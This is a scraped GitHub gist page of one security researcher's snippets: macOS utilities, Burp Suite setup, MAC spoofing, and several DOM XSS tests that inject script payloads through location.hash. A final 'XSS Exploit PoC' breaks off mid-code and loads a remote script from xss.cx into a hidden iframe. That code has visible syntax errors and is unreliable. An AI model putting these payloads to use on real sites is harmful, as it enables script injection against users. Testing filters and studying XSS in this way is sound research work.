David Hoyt xsscx
xsscx
/ MAC OSX System Inventory
Created
March 2, 2017 00:14
MAC OSX System Inventory - Public Domain Shell Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/libexec;clear;cd;p=(1295 ' 0.5 0.25 50 | |
| 1000 15 5120 1000 25000 6 6 5 1 0 100 ' 51 25600 4 10 25 5120 102400 1000 25 | |
| 1536 450 40 500 300 85 25 20480 262144 20 2000 524288 604800 5 1024 25 | |
| );k=({Soft,Hard}ware Memory Diagnostics Power FireWire Thunderbolt USB Bluetooth | |
| SerialATA Extensions Applications Frameworks PrefPane Fonts Displays PCI | |
| UniversalAccess InstallHistory ConfigurationProfile AirPort 'com\.apple\.' -\\t | |
| N\\/A | |
| 'AES|atr|udit|msa|dnse|ax|ensh|fami|FileS|fing|ft[pw]|gedC|kdu|etS|is\.|alk|ODSA| | |
| |otp|htt|pace|pcas|ps-lp|rexe|rlo|rsh|smb|snm|teln|upd-[aw]|uuc|vix|webf' | |
| OSBundle{Require,AllowUserLoa}d |
xsscx
/ gist:f727bb1abdd726c0ddff340b03fa73fd
Created
October 9, 2016 13:45
Inject Javascript to Proxy to set Debugging Config for Burp Suite | Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HTMLImageElement.prototype.__defineSetter__('src', function(val){debugger;}); | |
| Object.defineProperty(Object.prototype, | |
| 'top', | |
| {enumerable:false, set: function(value){ | |
| if(parseInt(value)<0)debugger; | |
| }} | |
| ); |
xsscx
/ gist:3bec235365d3c1d5b636203689129196
Created
October 9, 2016 13:41
window.location.hash test domxss console.log(location.hash);
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log(location.hash); | |
| var tabValue = document.URL; | |
| window.location = tabValue.substring(0, tabValue.lastIndexOf("#")); | |
| console.log(location.hash); | |
| window.location.hash = `#<noscript><script>confirm(1)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)'` | |
| location.reload(); | |
| console.log(location.hash); |
xsscx
/ gist:459aad4d04cb69218cc3c78ab9645416
Created
October 9, 2016 13:35
OSX 10.12 RAMDISK for AFL FUZZ, Burp etc..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diskutil erasevolume HFS+ 'RAM Disk' `hdiutil attach -nomount ram://9999999` |
xsscx
/ gist:e0f0f5af0c266c02f135d6aaf397cbe4
Created
October 9, 2016 13:33
location.hash listener update on change, inject javascript, domxss test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if( 'onHashChange' in window ) { | |
| window.addEventListener('hashchange', getHashValue, false); | |
| function getHashValue() { | |
| return window.location.hash; | |
| } | |
| } | |
| console.log(window.location.hash); | |
| window.location.hash = '#<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>'; | |
| console.log(window.location.hash); | |
| window.location.reload(true); |
xsscx
/ gist:1266130d5137f50dedbcb59849fdcd23
Created
October 9, 2016 13:30
OSX 10.12 Command Line Args for Burp Suite for Java (Current)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/java -Xmx5g -Djava.net.preferIPv4Stack=true -jar ~/jar/burp.jar | |
| ** This should be obvious.... | |
| server:lib xss$ /usr/bin/java -version | |
| java version "1.8.0_74" | |
| Java(TM) SE Runtime Environment (build 1.8.0_74-b02) | |
| Java HotSpot(TM) 64-Bit Server VM (build 25.74-b02, mixed mode) | |
| =============== |
xsscx
/ gist:0d8a6736c3c697e242e4c102de3b0d1e
Created
October 9, 2016 13:27
Random MAC Address for OSX 10.12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//' | xargs sudo ifconfig en0 ether |
xsscx
/ gist:ff0b188ddabab6707de5b7febdf6b81a
Created
October 9, 2016 13:26
OSX 10.12 cheap fix for the libreadline.6.dylib linked from awk in bash installed via Brew
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a cheap fix for the libreadline.6.dylib linked from awk in bash installed via Brew. | |
| ln -s /usr/local/lib/(your build path)/libreadline.6.dylib /usr/local/Cellar/readline/6.3.8/lib/libreadline.6.dylib | |
| Haven't had time to figure it out yet.. | |
| Delete /etc/motd | |
| sudo rm /etc/motd |
xsscx
/ findstr.txt
Last active
August 29, 2015 14:14
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ====================================================== | |
| Extract XSS Filters from MSHTML.DLL used in IE9 | |
| ====================================================== | |
| findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{" | |
| ====================================================== | |
| IE9 Summary - 23 Hardcoded Regex in mshtml.dll | |
| ====================================================== | |
| Fixed strings (2) javascript:, vbscript: | |
| HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form | |
| HTML attributes (3) " datasrc, " style=, " on*= (event handlers) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ============================================ | |
| XSS Exploit PoC #2 | |
| ============================================ | |
| function cx () { | |
| try { | |
| for (var i = 0; i < navigator.plugins.length; i++) { | |
| if {name.indexOf("Media Player") != -1) { | |
| var m = document.create.Element("iframe"); | |
| m.setAttribute("src", http://xss.cx/xss.js:); | |
| m.setAttribute("width", 0); |